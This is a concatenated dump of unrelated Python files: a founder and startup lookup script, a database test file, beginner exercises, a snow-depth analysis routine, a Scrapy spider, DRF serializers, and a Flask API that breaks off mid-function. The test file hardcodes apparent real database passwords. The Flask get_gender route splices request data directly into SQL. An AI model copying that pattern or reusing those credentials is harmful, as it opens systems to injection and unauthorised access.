sent = 'Positive'
elif sum(sentiment_list)<0:
sent = 'Negative'
else:
sent = 'Neutral'
print(f"The sentiment about {founder} in Twitter is {sent}")
# Look for data about the founder
def founders(founder, people):
full_name = founder.split()
public_tweets = api.search(founder)
# What to search on Google
look_for = founder
for i in range(len(people)):
if people.first_name.iloc[i] == full_name[0] and people.last_name.iloc[i]==full_name[1]:
display(Image(url=people.profile_image_url[i]))
print(f'We found this information about {founder}:')
print(f"Founder's name: {people.first_name[i]} {people.last_name[i]} ")
print(f"Title: {people.title[i]}")
print(f"Organization: {people.organization[i]}")
print(f"Location: {people.location_city[i]}, {people.location_region[i]}, {people.location_country_code[i]}")
if people.twitter_url[i] != None:
print(f"Twitter URL: {people.twitter_url[i]}")
if people.linkedin_url[i] != None:
print(f"Linkedin URL: {people.linkedin_url[i]}")
if people.facebook_url[i] != None:
print(f"Facebook URL: {people.facebook_url[i]}")
# Twitter analysis
tw_analysis_founder(public_tweets, founder)
# Google search
most_warnings(find_webs(founder), look_for)
# Look for data about company
def find_companies_by_size(size, companies, name, sector, company):
company_nan = companies.dropna()
company_sector = company_nan[company_nan['category_list'].str.contains(sector)].drop('index',axis=1).dropna()
company_sector['total_funding_size']=pd.qcut(company_sector.funding_total_usd, q=[0, .25, .75, 1], labels=['small', 'medium', 'big'])
if name in company_nan['name']:
return company_sector[(company_sector['total_funding_size']==size)& (company_sector['funding_total_usd'] > 100000) & (company_sector['status'] != 'closed')& (company_sector['country_code']==company.country_code)].sample()
else:
return company_sector[(company_sector['total_funding_size']==size)& (company_sector['funding_total_usd'] > 100000) & (company_sector['status'] != 'closed')].sample()
def competitor_info(company):
print(f"Company name: {company.name.item()}")
print(f"Total money raised: ${format(company.funding_total_usd.item(),',.2f')}")
print(f"Total rounds: {company.funding_rounds.item()}")
print(f"Webpage: {company.homepage_url.item()}")
print(f"Country: {company.country_code.item()}")
print(f"Status: {company.status.item()}")
print(f"Founded in: {company.founded_at.item()}")
# Sentiment analysis company
def tw_analysis_company(public_tweets, company):
sentiment_list = []
for tweet in public_tweets:
analysis = TextBlob(tweet.text)
sentiment_list.append(analysis.sentiment[0])
if sum(sentiment_list)>0:
sent = 'Positive'
elif sum(sentiment_list)<0:
sent = 'Negative'
else:
sent = 'Neutral'
print(f"The sentiment about {company} in Twitter is {sent}")
def startup(name, companies, sector):
company = companies[companies['name'] == name]
# What to search on Google
look_for = name
# Gather tweets
public_tweets = api.search(name)
try:
print(f"Company name: {company.name.item()}")
print(f"Total money raised: ${format(company.funding_total_usd.item(),',.2f')}")
print(f"Total rounds: {company.funding_rounds.item()}")
print(f"Webpage: {company.homepage_url.item()}")
print(f"Country: {company.country_code.item()}")
print(f"Status: {company.status.item()}")
# Find competitors
print('\n')
print(f"Competitors similar to {company.name.item()}:")
print('\n')
competitor_info(find_companies_by_size('small', companies, name, sector, company))
print('\n')
competitor_info(find_companies_by_size('medium', companies, name, sector, company))
print('\n')
competitor_info(find_companies_by_size('big', companies, name, sector, company))
except:
print(f"We couldn't find information about {name} in Crunchbase")
#Twitter sentiment analysis for company
tw_analysis_company(public_tweets, name)
# Google search
most_warnings(find_webs(name), look_for)
|
7,942 | c3970ad8bddb1ca136724f589ff9088024157662 |
import logging
from common.loghdl import getLogHandler
from datastore.dbutil import DBSQLLite, getDSConnStr
#from utils.generator import random_password
#from datastore.dbadmin import DBAdmin
#from datastore.initevaldb import *
############################ TESTING TO BE REMOVED
# md = cfg
#def test_spetest(cfg):
# rs = cfg.runQry(selSpeTestRegLkupQry,1) #OT
# rsLen = len(rs)
# d = {}
# if rsLen > 0 :
# rl = list(x[0] for x in rs)
# #mdie.speTestRegLkup.append(rl)
# print "RL is ",rl
# for r in rl: d[r] = cfg.runQry(selSpeTestLkupQry,r)
# print "dict is %s " % d
# print "keys are ", d.keys()
#
# else : print("No Special Test Available")
def test_sel_qry(qry,dsn):
print "QUERY IS %s " % qry
#log = Logger('C:\ptest\all\env\logs','C:\ptest')
log = logging.getLogger(__name__)
#cfg = DBOracle('infadev/infadev@infadev',log)
cs = getDSConnStr('SQLLITE', 'ib.user', 'ib.pwd', dsn)
cfg = DBSQLLite(cs,log)
ret = cfg.connToDB()
print "Connecting to DB : ret = %s " % ret
rs = cfg.runQry(qry)
for r in rs:
print "r = ", r
# D = {}
#print "rs = ", rs
# for (v,k) in rs: D[string.capitalize(k)]=v
# print D
# id = list(x[0] for x in rs)
# print "id = ", id
# sn = list(x[1] for x in rs)
# print "sn = ", sn
cfg.closeDBConn()
def test_updSQLITE_qry():
qrys = """
UPDATE SERVER_CRED
SET STATUS = ?
WHERE ID = ?
AND UNAME = ?
"""
qry = """ UPDATE SERVER_CRED
SET STATUS = :STATUS
WHERE ID = :ID
AND UNAME = :UNAME """
db = "C:\\users\\eocampo\\workspace\\rydinfap\\src\\databases\\rydinfa.dbf"
print " db is %s " % db
print "QUERY IS %s " % qry
#log = Logger('C:\ptest\all\env\logs','C:\ptest')
log = logging.getLogger(__name__)
cfg = DBSQLLite(db,log)
ret = cfg.connToDB()
print "Connecting to DB : ret = %s " % ret
val = ['5', '1', 'infa']
rs = cfg.exeQry(qry,val)
print "rs = %s " % rs
cfg.closeDBConn()
def testMSrep():
qry1 = """ select TASK
,ID
,Server
,Job_Name
,Severity
,Ack
from tblSQLProcessStatus
where ACK = 'N'
AND Server = 'INF'
AND TASK like '%FAILED%' """
qry = """ select TASK
,ID
,Server
,Job_Name
,Severity
,Ack
from tblSQLProcessStatus
where ACK = '%s'
AND Server = '%s'
AND TASK like '%%%s%%'
""" % ('N','M3','FAILED')
# cnxn = pyodbc.connect()
db = 'DRIVER={SQL Server};SERVER=maintserver3,1433;DATABASE=RepairHistory;UID=edwuser;;PWD=WiWLiC'
print " db is %s " % db
print "QUERY IS %s " % qry
log = Logger('C:\ptest\all\env\logs','C:\ptest')
cfg = ''
# cfg = DBPYODBC(db,log)
ret = cfg.connToDB()
print "Connecting to DB : ret = %s " % ret
val = ['5', '1', 'infa']
rs = cfg.runQry(qry)
for r in rs:
print r
print "rs = %s " % rs
cfg.closeDBConn()
def _getNZDS(sql,ib,log):
r = []
print ('qry = %s' % sql)
cs = getDSConnStr('NZODBC', ib.user, ib.pwd, ib.dbserver, ib.db)
dbh = NZODBC(cs, log)
if dbh.connToDB() != 0 : return r
r = dbh.runQry(sql)
dbh.closeDBConn()
return r
# Empty Container
class InfaBaseAppBean:
pass
def test_wday(log):
ib = InfaBaseAppBean
ib.user ='edwetl' ;ib.pwd='prodetl1203' ; ib.dbserver='rsnetezzap03' ; ib.db ='edw'
sql = ds.workDay
#sql =" SELECT Mon, Yr, Date_Day, Work_Day FROM EDW_WORK_DAY WHERE Date_Day =TO_DATE('19000101','yyyymmdd' )"
rs = _getNZDS(sql,ib,log)
if len(rs) != 1 : return -1
if len(rs[0]) != 4 : return -4
return rs[0][03]
def main():
test_sel_qry()
#log.setLogLevel("DEBUG")
#cfg = DBSQLLite('C:\\mytest\\data\\evalgen.dbf',log)
#cfg = DBSQLLite("C:\\eclipse\\workspace\\python\\test\\src\\data\\evalgen.dbf",log)
#ret = cfg.connToDB()
#cfg.closeDBConn()
# def test_crypt():
# enc = encrypt("welcome",'sscinfa2006')
# print "enc %s" % enc
#def test_ins():
#
# qry = DBMain.insServCredQry
# qry = """ INSERT INTO SERVER_CRED(
# SERV_ID,
# UNAME,
# PWD,
# DESCR
# )
# VALUES(
# :SERV_ID,
# :UNAME,
# :PWD,
# :DESCR
# ) """
# #dic = { 'SERV_ID':1, 'UNAME':'NAME','PWD':'PASWWORD','DESCR':'DESCR'}
# enc = encrypt("HELLO WORLD",'EOR')
# bindVar = ('SERV_ID','UNAME','PWD','DESCR')
# val = (3,'NAME',enc,'DESCR')
# dic =dict(zip( bindVar,val))
#
# print "START TEST_INS QRy = %s " % qry
# log = Logger('C:\ptest\all\env\logs','C:\ptest')
# cfg = DBOracle('tdbu03/tdbu03@IMMDWD',log)
# ret = cfg.connToDB()
# print "Connecting to DB : ret = %s " % ret
# lst = [1,'USER','PWD','THIS IS THE DESCR',]
# #ret = cfg.runQry(qry,lst)
# ret = cfg.exeQry(qry,dic)
# print " Query returned ", ret
# cfg.closeDBConn()
#
#
#def test_upd():
# qry = DBMain.updCredQry % 'SERVER_CRED'
# print "Qry is %s " % qry
# bindVar = ('ID','UNAME','PWD','DESCR')
# val = (3,'NAME','PWD','DESCR3')
# dic =dict(zip( bindVar,val))
# log = Logger('C:\ptest\all\env\logs','C:\ptest')
# cfg = DBOracle('tdbu03/tdbu03@IMMDWD',log)
# ret = cfg.connToDB()
# print "Connecting to DB : ret = %s " % ret
# ret = cfg.exeQry(qry,dic)
# print " Query returned ", ret
# cfg.closeDBConn()
#
#
#def test_ins_frfile():
#
# qry = DBMain.insCredQry % 'SERVER_CRED'
#
# #dic = { 'SERV_ID':1, 'UNAME':'NAME','PWD':'PASWWORD','DESCR':'DESCR'}
# enc = encrypt("HELLO WORLD",'EOR')
# bindVar = ('SERV_ID','UNAME','PWD','DESCR')
# val = (3,'NAME',enc,'DESCR')
# dic =dict(zip( bindVar,val))
#
# print "START TEST_INS QRy = %s " % qry
# log = Logger('C:\ptest\all\env\logs','C:\ptest')
# cfg = DBOracle('tdbu03/tdbu03@IMMDWD',log)
# ret = cfg.connToDB()
# print "Connecting to DB : ret = %s " % ret
# lst = [1,'USER','PWD','THIS IS THE DESCR',]
# #ret = cfg.runQry(qry,lst)
# ret = cfg.exeQry(qry,dic)
# print " Query returned ", ret
# cfg.closeDBConn()
#
#
#
#
#def _printLst(lst):
#
# if(len(lst) > 0):
# for r in lst:
# print "Records ", r
# print "r2 = %s, decrypt = %s " % ( r[2],decrypt(r[2],'EOR'))
#
#
#def test_sel():
#
# qry = "SELECT SERV_ID, UNAME, PWD, DESCR FROM SERVER_CRED"
# log = Logger('C:\ptest\all\env\logs','C:\ptest')
# cfg = DBOracle('tdbu03/tdbu03@IMMDWD',log)
# ret = cfg.connToDB()
# print "Connecting to DB : ret = %s " % ret
# ret = cfg.runQry(qry)
# print " Query returned ", ret
# _printLst(ret)
# cfg.closeDBConn()
#
#def test_new(prod_id):
# qry = """SELECT e.name,
# e.BU,
# s.name,
# s.alias,
# s.os,
# s.ver,
# s.patch,
# e.license ,
# e.ver ,
# e.patch ,
# e.build ,
# e.inst_path
#FROM environment e, server s
#WHERE e.prod_id = %s
#AND e.serv_id = s.id
#order by BU, e.name"""
# log = Logger('C:\ptest\all\env\logs','C:\ptest')
# cfg = DBSQLLite('C:\infaapp\soft_inv.sqlite',log)
# ret = cfg.connToDB()
# print "Connecting to DB : ret = %s " % ret
# ret = cfg.runQry(qry % prod_id)
# print " Query returned ", ret
# cfg.closeDBConn()
#
# return 0
#
#def get_pwd():
# qry = 'select NAME,OS from server'
# pwd_qry(qry)
#
#
#def uptime():
# qry = DBAdmin.selDomQry
# log = Logger('C:\ptest\all\env\logs','C:\ptest')
# cfg = DBOracle('tdbu03/tdbu03@IMMDWD',log)
# ret = cfg.connToDB()
# print "Connecting to DB : ret = %s " % ret
# ret = cfg.runQry(qry)
# print " Query returned ", ret
# cfg.closeDBConn()
if __name__ == '__main__':
#testMSrep()
#rc = main()
rc = 0
#test_crypt()
print "RC = ", rc
#test_new(3)
#test_qry(3)
#test_ins()
#test_upd()
#test_sel() # selSubjArea selInfSchedQry)
#test_sel_qry(DBInfaRepo.selRepWfl)
#test_updSQLITE_qry()
#get_pwd()
#uptime()
|
7,943 | 17326597d0597d16717c87c9bdf8733fb3acb77b | #! /usr/bin/python
import glo
print glo.x
a = "hello world"
print id(a)
a = "ni hao"
print id(a)
for y in range(0, 5, 2):
print y
for y in 1, 2, 3:
print y
if (glo.x == 2):
print("a==2")
else:
print("a!=2")
tuple_name = ("name", "age", "school") #can't modify, only-read
list_name = ["boy", "girl"] #can modify
dict_name = {"a":"hello", "b":"world"}
def fun_hello(a=0, b=1):
print("hello everybody")
print(a)
print(b)
fun_hello()
class MyClass:
common=5
def fun_sum(self, m, n):
print(m+n)
mySum = MyClass()
mySum.fun_sum(11, 22)
mySum001 = MyClass()
print(mySum.common)
print(mySum001.common)
MyClass.common = 1000
print(mySum.common)
print(mySum001.common)
mySum.common = 9999
print(mySum.common)
print(mySum001.common)
class Student(MyClass):
def fun_age(self, d):
print(d)
stu = Student()
stu.fun_age(100)
stu.fun_sum(100, 200)
f = file("sayHello.txt", "w")
f.write("hello girls")
f.close()
section = "hello boys"
print(section[2:6]) #llo
|
7,944 | 8502ebdb13c68a9a56a1a4ba51370d8458ca81dc | #!/usr/bin/python
# -*- coding:utf-8 -*-
import importlib
def import_string(path):
"""
根据字符串的形式去导入路径中的对象
:param path: 'src.engine.agent.AgentHandler'
:return:
"""
module_path,cls_name = path.rsplit('.',maxsplit=1)
module = importlib.import_module(module_path)
return getattr(module,cls_name) |
7,945 | 24a538dcc885b37eb0147a1ee089189f11b20f8a | # import necessary modules
import cv2
import xlsxwriter
import statistics
from matplotlib import pyplot as plt
import math
import tqdm
import numpy as np
import datetime
def getDepths(imgs, img_names, intersectionCoords, stakeValidity, templateIntersections,
upperBorder, tensors, actualTensors, intersectionDist, blobDistTemplate, debug, debug_directory,
image_dates, imageSummary):
"""
Function to calculate the change in snow depth for each stake using the tensor
from the specified template
Keyword arguments:
imgs -- list of input images
img_names -- list of corresponding image file names
intersectionCoords -- list containing intersection coordinates for input images
stakeValidity -- list indicating which stakes in input images are valid
templateIntersections -- list containing intersection coordinates for template
upperBorder -- upper crop parameter
tensors -- tensors from template image
actualTensors -- tensors calculated for input images
intersectionDist -- list containing distances from blobs to intersection points
for input images
blobDistTemplate -- list containing blob to intersection point distances from
template
debug -- bool flag indicating whether output images should be saved
debug_directory -- directory where output images should be written
image_dates -- list containing dates of images extracted from EXIF data
imageSummary -- dictionary containing information about each run
"""
# list containing median depths for each image
median_depths = list()
median_depths_est = list()
# contains output data for JSON file
depth_output = {}
# num of images
num_images = len(imgs)
# create output dictionary for images
depths = dict()
# create excel workbook and add worksheet
dest = str(debug_directory) + 'snow-depths.xlsx'
workbook = xlsxwriter.Workbook(dest)
worksheet = workbook.add_worksheet()
worksheet.set_column(0, len(tensors) + 3, 25)
# create format
cell_format = workbook.add_format()
cell_format.set_align('center')
# add titles
worksheet.write(0, 0, "Image", cell_format)
worksheet.write(0, 1, "Date", cell_format)
worksheet.write(0, len(tensors) + 2, "Median Depth (mm)", cell_format)
worksheet.write(0, len(tensors) + 3, "Median Estimate (mm)", cell_format)
for i, j in enumerate(tensors):
worksheet.write(0, i+2, ("Stake %s" % str(i)), cell_format)
# start from the first cell
row = 1
col = 0
# image iterator
iterator = 0
# iterate through images
for img_ in tqdm.tqdm(imgs):
# create an image to overlay points on if debugging
if(debug):
img_overlay = img_.copy()
# list to hold calculated depths
depths_stake = list()
estimate_stake = list()
# get image name
img_name = img_names[iterator]
# reset column
col = 0
# write to excel file
worksheet.write(row, col, img_name, cell_format)
if isinstance(image_dates[iterator], datetime.datetime):
worksheet.write(row, col + 1, image_dates[iterator].strftime('%x %X'), cell_format)
col = 2
# get intersection coordiantes
coords_stake = intersectionCoords[img_name]
# get blob intersection distances
intersection_dist_stake = intersectionDist[img_name]
# iterate through stakes in image
for i, stake in enumerate(coords_stake):
# if stake is valid and intersection point was found
if stakeValidity[img_name][i] and stake["average"][1] != False:
# add reference circles to output image if debugging
# shows intersection point of image with reference to template
if(debug):
cv2.circle(img_overlay, (int(templateIntersections[i][0]), int(templateIntersections[i][1]) - upperBorder), 5, (255,0,0), 3)
cv2.circle(img_overlay, (int(stake["average"][0]), int(stake["average"][1])), 5, (0,255,0), 2)
# calculate change in snow depth in mm
tensor = actualTensors[img_name][i] if actualTensors[img_name][i] != True else tensors[i]
depth_change = ((templateIntersections[i][1] - upperBorder) - stake["average"][1]) * tensor
# calculate change in snow depth using blob distances
distances_stake = list()
for w, x in enumerate(intersection_dist_stake[i]):
if x != False:
distances_stake.append((abs(blobDistTemplate[i][w]) - abs(x)) * tensor)
distance_estimate = statistics.median(distances_stake) if len(distances_stake) > 0 else 0
# write to excel file
worksheet.write(row, col + i, "%.2f (%.2f)" % (depth_change, distance_estimate), cell_format)
# add to list
depths_stake.append(depth_change)
estimate_stake.append(distance_estimate)
# if stake wasn't valid or intersection point not found
else:
# if stake was valid
if stakeValidity[img_name][i]:
worksheet.write(row, col + i, "Not Found", cell_format)
# invalid stake
else:
worksheet.write(row, col + i, "Invalid Stake", cell_format)
# append false to array
depths_stake.append(False)
estimate_stake.append(False)
# output debug image
if(debug):
cv2.imwrite(debug_directory + img_name, img_overlay)
# add list to dictionary
depths[img_name] = depths_stake
# determine median depth
valid_depths = [x for x in depths_stake if x != False]
valid_estimates = [x for x in estimate_stake if x != False]
if(len(valid_depths) > 0):
median = statistics.median(valid_depths)
median_est = statistics.median(valid_estimates)
else:
median = False
median_est = False
# add to median depth list
median_depths.append(median)
median_depths_est.append(median_est)
# write median to excel file
if median != False and median > 0:
worksheet.write(row, len(tensors) + 2, "%.2f" % median, cell_format)
worksheet.write(row, len(tensors) + 3, "%.2f" % median_est, cell_format)
elif median != False:
worksheet.write(row, len(tensors) + 2, "0.0", cell_format)
worksheet.write(row, len(tensors) + 3, "0.0", cell_format)
else:
worksheet.write(row, len(tensors) + 2, "n/a", cell_format)
worksheet.write(row, len(tensors) + 3, "n/a", cell_format)
# increment row
row += 1
# increment iterator
iterator += 1
# update image summary
imageSummary[img_name][" "] = ""
imageSummary[img_name]["Stake (Depth Calculation)"] = "Depth (mm) Estimate (mm)"
for e, depth in enumerate(depths_stake):
if isinstance(depth, float):
imageSummary[img_name][" %d " % (e+1)] = "%0.2f %0.2f " % \
(depth, estimate_stake[e])
else:
imageSummary[img_name][" %d " % (e+1)] = "%s %s " % \
("n/a", "n/a")
# close workbook
workbook.close()
# remove negative values
filterSet = zip(median_depths, median_depths_est, image_dates)
filterSet = [(x, y, z) for x, y, z in filterSet if x != False]
median_depths, median_depths_est, image_dates = zip(*filterSet)
median_depths = np.asarray(median_depths).clip(0)
median_depths_est = np.asarray(median_depths_est).clip(0)
# generate plot
fig,ax = plt.subplots(1)
plt.plot(image_dates, median_depths)
plt.plot(image_dates, median_depths_est)
plt.gcf().autofmt_xdate()
plt.legend(['Median Depth', 'Median Estimate'], loc='upper left')
ax.set_xlabel("Date")
ax.set_ylabel("Snow Depth (mm)")
plt.xticks(rotation=75)
plt.tight_layout()
# save figure
plt.savefig(debug_directory + "depth-graph.jpg")
plt.close()
# return dictionary containing snow depth changes
return depths, imageSummary
|
7,946 | c355be4e05d1df7f5d6f2e32bbb5a8086babe95b | #5.8-5.9
users = ['user1', 'user2', 'user3', 'user4', 'admin']
#users = []
if users:
for user in users:
if user == 'admin':
print(f"Hello, {user}, would you like to see a status report?")
else:
print(f"Hello, {user}, thank you for logging in again")
else:
print("We need to ind some users!")
#5.10
current_users = ['name1', 'name2', 'name3', 'name4', 'name5']
new_users = ['naMe5', 'name6', 'name7', 'name8', 'name9', 'Name1']
for new_user in new_users:
if new_user.lower() in current_users:
print(f"Sorry, this name - "
f"{new_user.title()} is used. Try again with another name.")
else:
print(f"You can use this name - {new_user.title()}.")
#5.11
numbers = [1, 2, 3, 4, 5, 6, 7, 8, 9]
for number in numbers:
if number == 1:
print(f"1st")
elif number == 2:
print("2nd")
elif number == 3:
print("3rd")
else:
print(f"{number}th") |
7,947 | ececcf40005054e26e21152bcb5e68a1bce33e88 | ' a test module '
__author__ = 'Aaron Jiang'
import sys
def test():
args = sys.argv
if len(args) == 1:
print('Hello World')
elif len(args) == 2:
print('Hello, %s!' % args[1])
else:
print('TOO MANY ARGUMENTS!')
if __name__ == '__main__':
test()
class Test():
count = 0
print('called ', count)
def __init__(self, name):
self.__name = name
Test.count += 1
t1 = Test('Aaron')
print(t1.count)
Test.count = 10
t2 = Test('Aaron2')
print(t2.count)
class Screen:
@property
def width(self):
return self._width
@width.setter
def width(self, width):
self._width = width
@property
def height(self):
return self.__height
@height.setter
def height(self, height):
self.__height = height
@property
def resolution(self):
return self._width * self.__height
sc = Screen()
sc.width = 1024
sc.height = 1
print(sc.resolution)
class Chain(object):
def __init__(self, path=''):
self._path = path
def __getattr__(self, path):
return Chain('%s/%s' % (self._path, path))
def __str__(self):
return self._path
__repr__ = __str__
print(Chain('/nan').status.user.timeline.list)
|
7,948 | f1eaba91e27dc063f3decd7b6a4fe4e40f7ed721 | #! /usr/bin python3
# -*- coding: utf-8 -*-
from scrapy import Request
from scrapy.linkextractors.lxmlhtml import LxmlLinkExtractor
from scrapy.spiders import CrawlSpider
from scrapy.spiders import Rule
from xici_bbs.spiders.author import get_author_item
from xici_bbs.spiders.comment import get_comment_list, get_comment_next_page
from xici_bbs.spiders.post import get_post_item
class XiciSpider(CrawlSpider):
name = 'xici'
start_urls = ['http://www.xici.net']
post_extract = LxmlLinkExtractor(
allow=(
'/d\d+.htm',
),
allow_domains=(
'xici.net'
),
# deny=(
#
# ),
deny_domains=(
'account.xici.net',
)
)
author_extract = LxmlLinkExtractor(
allow=(
'/u\d+$',
'/u\d+/$',
),
allow_domains=(
'xici.net',
),
# deny=(
#
# ),
deny_domains=(
'account.xici.net',
)
)
follow_extract = LxmlLinkExtractor(
# allow=(
# '/s/[0-9]+',
# ),
allow_domains=(
'xici.net',
),
deny=(
'/help/',
),
deny_domains=(
'account.xici.net',
# 'life.xici.net',
)
)
rules = (
Rule(author_extract, follow=True, callback='parse_author'),
Rule(post_extract, follow=True, callback='parse_post'),
# Rule(follow_extract, follow=True, callback='parse_follow'),
Rule(follow_extract, follow=True),
)
# a_count = 0
# p_count = 0
# f_count = 0
def parse_author(self, response):
# self.a_count += 1
# print('author: ', self.a_count, ' ', response.url)
author_item = get_author_item(response)
yield author_item
def parse_post(self, response):
# self.p_count += 1
# print('post: ', self.p_count, ' ', response.url)
post_item = get_post_item(response)
for item_or_request in self.parse_comment(response, post_item):
yield item_or_request
# def parse_follow(self, response):
# self.f_count += 1
# print('follow: ', self.f_count, ' ', response.url)
def parse_comment(self, response, post_item=None):
if not post_item:
post_item = response.meta['post_item']
for comment_item in get_comment_list(response):
post_item['comment_ids'].append(comment_item['comment_id'])
yield comment_item
comment_next_page = get_comment_next_page(response)
if comment_next_page:
yield Request(
url=comment_next_page,
callback=self.parse_comment,
meta={
'post_item': post_item,
}
)
else:
yield post_item
|
7,949 | cd9cc656a62728b3649b00c03ca8d05106015007 | from rest_framework import serializers
#from rest_framework.response import Response
from .models import Category, Product
class RecursiveSerializer(serializers.Serializer):
def to_representation(self, value):
serializer = self.parent.parent.__class__(value, context=self.context)
return serializer.data
class CategorySerializers(serializers.ModelSerializer):
childcategories = RecursiveSerializer(many=True, read_only=True)
class Meta:
model = Category
fields = ('id', 'name', 'parent', 'childcategories',)
class ProductSerializer(serializers.ModelSerializer):
class Meta:
model = Product
fields = ('id', 'name', 'price', 'categories')
#class CategorySerializers(serializers.ModelSerializer):
# class Meta:
# model = Category
# fields = ('id', 'name', 'parent')
#def get_fields(self):
# fields = super(CategorySerializers, self).get_fields()
# #fields['childcategories'] = CategorySerializers(many=True, allow_null=True)
# return fields
#class CategorySerializers(serializers.ModelSerializer):
# class Meta:
# model = Category
# fields = ('id', 'name', 'parent') |
7,950 | 2f76bcfde11597f87bb9e058f7617e95c78ed383 | # app/__init__.py
import json
from flask_api import FlaskAPI, status
import graphene
from graphene import relay
from graphene_sqlalchemy import SQLAlchemyConnectionField, SQLAlchemyObjectType
from flask_sqlalchemy import SQLAlchemy
from sqlalchemy import func
from flask import request, jsonify, abort, make_response
from flask_graphql import GraphQLView
from shapely.geometry import shape, Point
# local import
from instance.config import app_config
# For password hashing
from flask_bcrypt import Bcrypt
# initialize db
db = SQLAlchemy()
from app.models import Date, Area, LTESighting, SmallCell, Site, SightingsPerHourPerCountry, SightingsNew, SightingsBase, WideSighting, Journey
from app.models import Department as DepartmentModel
from app.ng_event_models import ZoneDistrict, AttractionTotal, Profile, PurchDistrict, DOWFrequency
class Department(SQLAlchemyObjectType):
class Meta:
model = DepartmentModel
interfaces = (relay.Node, )
class Query(graphene.ObjectType):
node = relay.Node.Field()
all_employees = SQLAlchemyConnectionField(Department)
def create_app(config_name):
app = FlaskAPI(__name__, instance_relative_config=True)
# overriding Werkzeugs built-in password hashing utilities using Bcrypt.
bcrypt = Bcrypt(app)
schema = graphene.Schema(query=Query)
app.add_url_rule('/graphql', view_func=GraphQLView.as_view('graphql', schema=schema, graphiql=True))
app.config.from_object(app_config[config_name])
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
db.init_app(app)
@app.route('/api/areas/create', methods=['POST'])
def create_areas():
# get the access token
name = request.data.get('name', '')
geodata = request.data.get('geodata', '')
center_lat = request.data.get('center_lat')
center_lng = request.data.get('center_lng')
zoom = request.data.get('zoom')
area = Area(name=name, geodata=geodata, center_lat=center_lat, center_lng=center_lng, zoom=zoom)
area.save()
response = jsonify({
'id': area.id,
'name': area.name,
'geodata': area.geodata,
'center_lat' : area.center_lat,
'center_lng' : area.center_lng,
'zoom' : area.zoom,
'date_created': area.date_created,
'date_modified': area.date_modified
})
return make_response(response), 201
@app.route('/api/areas/delete', methods=['POST'])
def delete_areas():
# get the access token
id = request.data.get('id', 0)
area = Area.query.filter_by(id=id).first()
if (area is not None):
area.delete()
return make_response(jsonify({'id':id})), 200
@app.route('/api/sightingsperhour', methods=['GET'])
def get_sightingsperhour():
# get all the areas
sightings = SightingsPerHourPerCountry.query.all()
results = []
for sighting in sightings:
results.append({'country' : sighting.country, 'hour' : sighting.hour, 'count' : sighting.count})
return make_response(jsonify({ 'list' : results })), 200
@app.route('/api/sightingsnew', methods=['POST'])
def sightingsnew():
sightings = db.session.query(SightingsBase.site_id, SightingsBase.country, func.count(SightingsBase.roundedtoday))\
.filter(SightingsBase.site_id.in_(request.data['selectedRow']))\
.filter(SightingsBase.roundedtoday.between(request.data['selectedDates'][0], request.data['selectedDates'][1]))\
.group_by(SightingsBase.site_id, SightingsBase.country)\
.order_by(SightingsBase.site_id, func.count(SightingsBase.roundedtoday).desc())\
results = []
for sighting in sightings.all():
results.append({'country' : sighting.country, 'site_id' : sighting.site_id, 'count' : sighting[2]})
return make_response(jsonify({ 'list' : results })), 200
@app.route('/api/widesightingsnew', methods=['POST', 'GET'])
def widesightingsnew():
sightings = db.session.query(WideSighting.site_id, WideSighting.gender, func.count(WideSighting.gender))\
.filter(WideSighting.site_id.in_([138, 134]))\
.group_by(WideSighting.site_id, WideSighting.gender)
results = []
for sighting in sightings.all():
#gender = sighting.gender if len(sighting.gender) else 'unknown'
results.append({'site_id' : sighting.site_id, 'gender' : sighting.gender, 'count' : sighting[2]})
return make_response(jsonify({ 'list' : results })), 200
@app.route('/api/widesightings', methods=['GET'])
def widesightings():
sightings = WideSighting.get_all()
results = []
for sighting in sightings:
results.append(sighting.serialise())
return make_response(jsonify({ 'list' : results })), 200
@app.route('/api/sites', methods=['GET'])
def get_sites():
# get all the areas
sites = Site.get_all()
results = []
for site in sites:
results.append(site.serialise())
return make_response(jsonify({ 'list' : results })), 200
@app.route('/api/dates', methods=['GET'])
def get_dates():
# get all the areas
dates = Date.get_all()
results = []
for date in dates:
results.append(date.serialise())
return make_response(jsonify({ 'list' : results })), 200
@app.route('/api/areas', methods=['GET'])
def get_areas():
# get all the areas
areas = Area.get_all()
allSmallCells = SmallCell.get_all()
results = []
for area in areas:
smallcellInArea = []
for smallcell in allSmallCells:
smallcellInArea.append(smallcell.serialise())
obj = {
'id': area.id,
'name': area.name,
'date_created': area.date_created,
'date_modified': area.date_modified,
'center_lat' : area.center_lat,
'center_lng' : area.center_lng,
'zoom' : area.zoom,
'geodata': area.geodata,
'smallcells' : smallcellInArea
}
results.append(obj)
return make_response(jsonify({ 'list' : results })), 200
@app.route('/api/smallcells', methods=['GET'])
def get_smallcells():
allSmallCells = SmallCell.query.order_by(SmallCell.id).all()
results = []
for smallcell in allSmallCells:
results.append(smallcell.serialise())
return make_response(jsonify({ 'list' : results })), 200
@app.route('/api/smallcells/update', methods=['POST'])
def update_smallcell():
smallcell_id = request.data.get('id', '')
site_id = request.data.get('site_id', '')
smallcell = SmallCell.query.filter_by(id=smallcell_id).first()
smallcell.site_id = site_id
smallcell.save()
return make_response(jsonify({ 'smallcell_id' : smallcell.id, 'site_id' : smallcell.site_id })), 200
@app.route('/api/sighting/byarea/<areaid>', methods=['GET'])
def get_sighting(areaid):
import string
area = Area.query.filter_by(id=areaid).first()
if area is None : return make_response(jsonify({ 'list' : [] })), 200
sites = []
for site in Site.get_all():
if area.contains(site):
sites.append(str(site.id))
def generate_random_data(num_rows):
import random
latitude = 51.51451110408478
longitude = -0.12620388576521444
result = []
for _ in range(num_rows):
dec_lat = random.random()/10
dec_lon = random.random()/10
result.append({'lat' : latitude + dec_lat, 'lng' : longitude + dec_lon})
return result
results = []
if (len(sites) > 0):
for row in db.session.execute('select * from get_gender_crossfilter(ARRAY[' + ','.join(sites) + '])'):
results.append(({ 'geos': generate_random_data(5), 'gender' : row['__gender'], 'age_range' : row['__age_range'], 'timestamp' : row['__sighting_date'], 'count' : row['__count'] }))
return make_response(jsonify({ 'list' : results })), 200
@app.route('/api/sighting/getgender/', methods=['POST'])
def get_gender():
site_ids = str(request.data.get('site_ids', ''))
from_sighting_date = request.data.get('selectedDates')[0]
to_sighting_date = request.data.get('selectedDates')[1]
import string
results = []
for row in db.session.execute("select * from get_gender(ARRAY[" + site_ids + "]," + "'" + from_sighting_date + "'" + "," + "'" + to_sighting_date + "'" + ")"):
